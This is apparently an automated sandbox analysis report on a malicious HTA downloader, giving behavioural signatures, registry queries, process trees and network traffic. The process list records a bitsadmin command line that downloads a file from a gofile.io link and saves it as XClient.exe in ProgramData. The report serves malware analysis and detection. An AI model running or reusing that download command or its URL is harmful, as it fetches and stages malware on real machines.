Analysis Overview
SHA256
ef8789feee0030d961135116b75790b99bd914de5467671023dec1cafcb0ca1e
Threat Level: Likely malicious
The file Downloader.hta was found to be: Likely malicious.
Malicious Activity Summary
Download via BitsAdmin
Checks computer location settings
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-27 07:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-27 07:33
Reported
2024-08-27 07:50
Platform
win10v2004-20240802-en
Max time kernel
436s
Max time network
438s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3296 wrote to memory of 4784 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\bitsadmin.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://gofile.io/d/G6Wixe C:\ProgramData\XClient.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.38.43.18:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | 18.43.38.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
Files